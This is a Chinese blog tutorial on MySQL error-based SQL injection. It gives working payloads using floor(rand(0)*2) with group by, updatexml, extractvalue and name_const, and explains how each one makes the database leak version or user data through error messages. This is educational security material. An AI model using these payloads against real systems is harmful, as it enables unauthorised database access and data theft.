SQL注入攻击之报错注入

最新推荐文章于 2024-03-01 09:34:16 发布
最新推荐文章于 2024-03-01 09:34:16 发布
阅读量266 收藏
点赞数
文章标签: mysql sql 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36242914/article/details/115287735
版权

                                     SQL注入攻击之报错注入

1.floor(rand(0)*2)

注入语句:

and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);

报错注入原理:

报错关键点group by floor((rand(0)*2))

1. rand(0)生成一组以0为种子产生一组固定随机数:0.15522...,0.62088...,0.63875...,0.33109...,0.73922...,0.70281...,0.29642...等;

2. rand(0)*2将生成的随机数乘以2: 0.31...,1.24...,1.28...,0.66...,1.48...,1.41...,0.59...等;

3.floor(rand(0)*2) 进行向下取整:0,1,1,0,1,1,0...等;

4.group by (floor(rand(0)*2)) 将查询结果进行分组:(gooup by:当查询到的主键键值不存在时会将下个数据插入到虚拟表中,如果存在则将该项键值对应的的总数+1),

                                                                                   整数数据0,1,1,0,1,1,0...两次在查询到0时虚拟表中都没有键值0,都会将插入下个键值1,到第二次插入数据时则会因为虚拟表中数据已经有主键1了而造成主键冗余问题。

2.updatexml()

注入语句:

select updatexml(1,concat(0x7e,version(),0x7e),0x7e);

报错注入原理:

updatexml函数:updatexml(XML_document,XPath_string,new_value),

0x7e,特殊字符~,利用XPath_string解析错误时回显报错信息。

3.extractvalue()

注入语句:

select extractvalue(1,concat(0x7e,version()));

报错注入原理:

.extractvalue函数:.extractvalue(XML_document,XPath_string),

同updatexml()函数一样,利用XPath_string解析错误时回显报错信息。

4.name_const函数报错

注入语句:

select * from(select name_const(version(),1),name_const(version(),1))a;

报错注入原理:列名重复。

只有version()函数可使用。

 

Adlut
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
分享一个简单的sql注入
12-16
比如先前的很多影视网站泄露VIP会员密码大多就是通过WEB表单递交查询字符暴出的,这类表单特别容易受到sql注入攻击。 分别输入1,2,3有对应的结果 使用’会,于是 构造常用的sql语句:1′ and ‘1’=’1 没有...
SQL注入原理
qq_44754481的博客
03-17 1万+
一、SQL注入原理 SQL注入就是把SQL命令插入到Web表单然后提交到所在页面请求(查询字符串),从而达到欺骗服务器执行恶意的SQL命令。 它是利用现在已有的应用程序,将SQL语句插入到数据库中执行,执行一些并非按照设计者意图的SQL语句。 产生原因: 产生原因是程序没有细致过滤用户输入的数据,从而导致非法数据进入系统。 二、相关技术原理: SQL注入可以分为平台层注入和代码注入。前者是由不安全...
HTML5学习
qq_36242914的博客
03-23 173
HTML5学习 HTML 指的是超文本标记语言:HyperTextMarkupLanguage,使用标记标签来描述网页,HTML文档也叫做web 页面。 <!DOCTYPE html> <html> <head> <meta charset="utf*-8"> <title>我的标题</title> </head> <body> <h1>我的第一个标题</h1> ...
sql注入攻击原理
最新发布
完颜振江
03-01 886
应用程序在未正确过滤或者验证用户输入数据的情况下,将恶意的 SQL 查询与应用程序原本的查询逻辑组合在一起,并发送到后端数据库服务器执行。SQL 注入攻击是一种常见的网络安全攻击,利用了应用程序对用户输入数据的不正确处理,导致恶意用户能够在 SQL 查询中插入恶意的 SQL 代码,以执行未经授权的数据库操作。总是为真,因此查询语句的条件总是为真,无论密码是什么,都将返回一个用户记录,从而绕过了身份验证,使攻击者成功登录到系统中。:定期监控应用程序的数据库活动,并记录潜在的 SQL 注入攻击尝试。
PWN:Python3 bytes类型转换为str
qq_36242914的博客
10-12 197
pwntools python3 bytes str
sql注入攻击详解(原理理解)
热门推荐
~ Caesar's wish书屋 ~
12-14 3万+
前段时间,在很多博客和微博中暴漏出了12306铁道部网站的一些漏洞,作为这么大的一个项目,要说有漏洞也不是没可能,但其漏洞确是一些菜鸟级程序员才会犯的误。其实sql注入漏洞就是一个。作为一个菜鸟小程序员,我对sql注入的东西了解的也不深入,所以抽出时间专门学习了一下。现在把学习成果分享给大家,希望可以帮助大家学习。下面我们就来看一下。 一、什么是sql注入呢?    
Sql注入详解(原理篇)
Naive的博客
09-11 5192
SQL 注入漏洞非常复杂,区分各种数据库类型,提交方法,数据类型等注入,同样此类漏洞是WEB安全中严重的安全漏洞,学习如何利用,挖掘,修复也是很重要的。SQL 注入就是指 Web 应用程序对用户输入的数据合法性没有过滤或者是判断,攻击者可以在Web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。
sql注入攻击的原理(sql注入攻击防范)
weixin_45901902的博客
08-19 2万+
SQL 注入SQLi)是一种可执行恶意 SQL 语句的注入攻击。这些 SQL 语句可控制网站背后的数据库服务。攻击者可利用 SQL 漏洞绕过网站已有的安全措施。他们可绕过网站的身份认证和授权并访问整个 SQL 数据库的数据。他们也可利用 SQL 注入对数据进行增加、修改和删除操作。 SQL 注入可影响任何使用了 SQL 数据库的网站或应用程序,例如常用的数据库有 MySQL、Oracle、SQL Server 等等。攻击者利用它,便能无需授权地访问你的敏感数据,比如:用户资料、个人数据、商业机密、知识产
SQL注入之Access注入 (手工)
12-14
SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器...
SQL注入攻击-高级方法,手动注入 自动化注入
11-17
SQL注入攻击-高级方法,手动注入 自动化注入 union 注入 注入 union 注入
Web应用安全:使用SQL注入攻击篡改数据实验.doc
06-20
实验二:使用SQL注入攻击篡改数据 一、实验目的 实践SQL注入攻击 进入网站后台 二、实验内容 首先找到注入点,判断注入类型与注入方式,然后再进行暴库、表、表字段操作,最后再获取账号与密码数据,而后返回登录...
MYSQL 通过NAME_CONST()注入
Ciyaso的博客
01-18 1765
函数解释 NAME_CONST(name,value) Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants. mysql> SELECT NAME_CONST('myname', 14); +--------+ | myname | +-----
「网络安全」SQL注入攻击的原理
m0_61869253的博客
03-21 587
保护产品免受SQL注入是必不可少的,以确保其正常运行并防止数据泄露。当您编写访问数据库的代码时,考虑从一开始就防止SQL注入是一种很好的做法。这是防止这些漏洞发生的最佳时机,而不是以后修补它们。开发过程应包括针对SQL注入的测试,然后是外部扫描程序。应用程序防火墙 - WAF还可以检测和阻止对您的应用程序的攻击。保护产品免受SQL注入是必不可少的,以确保其正常运行并防止数据泄露。当您编写访问数据库的代码时,考虑从一开始就防止SQL注入是一种很好的做法。
sql注入——注入
m0_73756016的博客
10-18 1133
注入是什么 什么是注入? 这是一种页面响应形式。响应过程如下: 用户在前台页面输入检索内容 后台将前台页面上输入的检索内容无加区别的拼接成sql语句,送给数据库执行。 数据库将执行的结果返回给后台,后台将数据库执行的结果无加区别的显示到前台页面上。 注入存在的基础:两个“无加区别”后台对于输入输出的合理性没有做检查 分类 1. 通过floor()注入 2.通过extractValue()注入 3.通过updateXml()注入 4.通过NAME_CONST()
SQL注入注入
Forget_liu的博客
06-10 1615
第二次是假设group by后面的字段的值在虚拟表中不存在,那就需要把它插入到虚拟表中,这里在插入时会进行第二次运算,由于rand函数存在一定的随机性,所以第二次运算的结果可能与第一次运算的结果不一致,但是这个运算的结果可能在虚拟表中已经存在了,那么这时的插入必然导致主键的重复,进而引发误。很显然rand(0)是伪随机的,有规律可循,这也是我们采用rand(0)进行注入的原因,rand(0)是稳定的,这样每次注入都会,而rand()则需要碰运气了,我们测试结果如下。//以下案例代码是抄的。
SQL注入-注入
LJH1999ZN的博客
02-09 9622
sql注入注入的演示与介绍
Java学习之路_选择排序
qq_36242914的博客
06-07 97
代码显示: /** 实现选择排序功能 */ class SelectSort { public static void main(String[] args) { int[] arr = new int[]{11,58,56,43,92,45,91,65,75,98,35}; //定义一组数组 System.out.println("排序前:"); printArr(arr); selectSort(arr); System.out.p
最详细的SQL注入注入
qq_62539372的博客
06-23 1万+
最详细的sql注入注入,非常适合小白!!
SQL注入中的注入
04-05
注入是一种利用SQL语句执行误返回的方式来获取数据库信息的攻击手段。攻击者通过构造恶意的SQL语句,使得数据库系统在执行时出现误,从而获得敏感信息或者执行非法操作。 注入的原理是利用数据库系统在执行SQL语句时,如果出现误会返回误信息的特性。攻击者通过构造恶意的SQL语句,使得数据库系统在执行时出现误,从而返回误信息。误信息中可能包含有关数据库结构、表、列名、数据类型等敏感信息,攻击者可以根据这些信息进一步进行攻击。例如,攻击者可以通过注入获取管理员账户的密码,从而登录管理员账户并执行非法操作。 防范注入的方法包括: 1. 对用户输入的数据进行过滤和验证,确保输入数据的合法性和安全性。 2. 使用参数化查询或预编译语句,避免将用户输入的数据直接拼接到SQL语句中,从而避免SQL注入攻击。 3. 禁用或限制数据库系统返回误信息的功能,从而避免敏感信息被攻击者获取。 4. 更新和维护数据库系统,及时修复已知的漏洞和安全问题,提高数据库系统的安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值